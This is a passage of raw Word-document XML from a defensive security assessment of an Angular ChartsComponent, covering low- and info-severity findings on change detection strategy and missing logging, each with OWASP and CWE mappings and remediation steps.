            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04 — Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-1188: Insecure Default Initialization of Resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AVSV Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V1.1.2 — Verify the use of a threat modeling approach for security design decisions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ChartsComponent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@Component</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">decorator configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Component rendering lifecycle; indirect impact on child component security boundaries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The documentation notes that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ChartsComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">does not specify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">changeDetection: ChangeDetectionStrategy.OnPush</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. While the documentation correctly identifies this as having "no functional impact given the component's empty class body," the default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CheckAlways</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">strategy means Angular re-evaluates this component on every change detection cycle triggered anywhere in the application. For a shell component with no state, this is unnecessary processing. More relevantly from a security design perspective, explicitly declaring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OnPush</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on shell components establishes a clear architectural boundary that prevents accidental introduction of reactive state without deliberate design — a defense-in-depth practice aligned with secure-by-default principles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 17 of the Charts screen documentation states: "the component does not specify Angular's</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">changeDetection: ChangeDetectionStrategy.OnPush</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@Component</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">decorator, which is a best-practice recommendation for shell components that have no local state."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This is not directly exploitable. However, if a future developer adds reactive state to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ChartsComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">without understanding the change detection implications, the default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CheckAlways</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">strategy could cause unintended re-rendering of child components, potentially exposing stale or incorrect data in edge cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">changeDetection: ChangeDetectionStrategy.OnPush</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@Component</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">decorator:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Component</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  selector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'ngx-charts'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  templateUrl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./charts.component.html'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  changeDetection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ChangeDetectionStrategy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">OnPush</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ChangeDetectionStrategy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@angular/core</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify that child routes continue to render correctly after the change —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OnPush</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on a shell component with no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@Input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bindings should have no functional impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Charts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Section 17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-004: No Security Logging or Monitoring Instrumentation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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A09 — Security Logging &amp; Monitoring Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-778: Insufficient Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AVSV Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V7.1.1 — Verify that the application does not log credentials or payment details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ChartsComponent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— error handling and observability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security event audit trail; unauthorized access detection capability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The documentation explicitly confirms that no logging or monitoring instrumentation is present in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ChartsComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: "No error tracking services (such as Sentry, Datadog, LogRocket, or Bugsnag) and no analytics event calls (such as PostHog, Mixpanel, or Google Analytics) are present or referenced in this component." While a shell component with no business logic has limited logging requirements, the complete absence of any observability integration means that navigation events, route guard failures, and unexpected rendering errors at this level are invisible to security monitoring systems. This finding is consistent across all three assessed screens (see also</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec-008">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-008</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec-011">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-011</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 10 of the Charts screen documentation states: "No error tracking services (such as Sentry, Datadog, LogRocket, or Bugsnag) and no analytics event calls (such as PostHog, Mixpanel, or Google Analytics) are present or referenced in this component."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker repeatedly probes the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">route hierarchy with invalid session tokens or manipulated authorization headers. Because no logging is present at the component level and the routing module was not reviewed, there is no confirmed mechanism to detect, alert on, or audit these access attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integrate a centralized error tracking service (e.g., Sentry) at the Angular application level via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ErrorHandler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— this does not require per-component instrumentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ensure that route guard failures (authentication redirects) are logged with sufficient context (timestamp, attempted route, user identifier if available) to support security incident investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify that the logging implementation does not capture sensitive data such as authentication tokens or PII in log payloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Not documented — WHO: the DevOps or platform engineering team; WHAT: Is a centralized Angular</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ErrorHandler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or application-level logging service (e.g., Sentry, Datadog RUM) configured for this application? If so, does it capture route navigation events and guard failures?; WHERE: Insert confirmed logging infrastructure details into the Description section of SEC-004, SEC-008, and SEC-011]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Charts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Section 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-005: Standalone Component Migration Gap — NgModule Architecture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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04 — Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-1059: Incomplete Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AVSV Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V1.1.1 — Verify the use of a secure software development lifecycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ChartsComponent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— Angular architecture pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
